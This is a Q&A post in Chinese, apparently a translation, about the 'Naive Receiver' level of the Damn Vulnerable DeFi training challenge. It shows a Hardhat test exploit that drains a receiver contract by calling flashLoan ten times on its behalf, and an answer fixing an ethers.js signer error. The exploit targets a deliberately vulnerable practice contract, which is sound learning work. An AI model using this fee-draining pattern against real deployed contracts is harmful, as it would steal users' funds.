Damn易受攻击的Defi (朴素-接收者)中的无效ENS名称

Question

我正在努力解决易受攻击的Defi挑战的二级-朴素接收器。

我们必须通过利用缺失的访问控制来耗尽用户的平衡，允许任何人成为借款者，并调用闪存贷款。这使任何人都可以申请贷款的接收合同，并从他们的余额，因为1以太费用。

这是我的解决方案：

    it('Exploit', async function () {
        for(let i=0; i<10; i++) {
            await this.pool.flashLoan(this.receiver.address, ethers.utils.parseEther('0'), {from: attacker});
        }
    });

下面是我在运行测试yarn hardhat test test/naive-receiver/naive-receiver.challenge.js时遇到的错误：

  0 passing (871ms)
  2 failing

  1) [Challenge] Naive receiver
       Exploit:
     Error: invalid ENS name (argument="name", value="<SignerWithAddress 0x3C44CdDdB6a900fa2b585dd299e03d12FA4293BC>", code=INVALID_ARGUMENT, version=providers/5.4.5)
      at Logger.makeError (node_modules/@ethersproject/logger/src.ts/index.ts:225:28)
      at Logger.throwError (node_modules/@ethersproject/logger/src.ts/index.ts:237:20)
      at Logger.throwArgumentError (node_modules/@ethersproject/logger/src.ts/index.ts:241:21)
      at EthersProviderWrapper.<anonymous> (node_modules/@ethersproject/providers/src.ts/base-provider.ts:1565:20)
      at step (node_modules/@ethersproject/providers/lib/base-provider.js:48:23)
      at Object.next (node_modules/@ethersproject/providers/lib/base-provider.js:29:53)
      at fulfilled (node_modules/@ethersproject/providers/lib/base-provider.js:20:58)

  2) [Challenge] Naive receiver
       "after all" hook for "Exploit":
     AssertionError: Expected "10000000000000000000" to be equal 0
      at Context.<anonymous> (test/naive-receiver/naive-receiver.challenge.js:44:17)
      at processTicksAndRejections (node:internal/process/task_queues:95:5)
      at runNextTicks (node:internal/process/task_queues:64:3)
      at listOnTimeout (node:internal/timers:533:9)
      at processTimers (node:internal/timers:507:7)



error Command failed with exit code 2.

我的代码或逻辑有什么问题吗？

Answer 1

不能使用this.pool.flashLoan()直接调用{from: attacker}函数。

使用ethers.js，您需要重新连接与签名人的合同--类似这样的东西，

it('Exploit', async function () {
        for (let i = 0; i < 10; i++) {
            await this.pool.connect(attacker).flashLoan(this.receiver.address, ethers.utils.parseEther('0'));
        }
    });

参考- https://github.com/ethers-io/ethers.js/issues/1449#issuecomment-817198604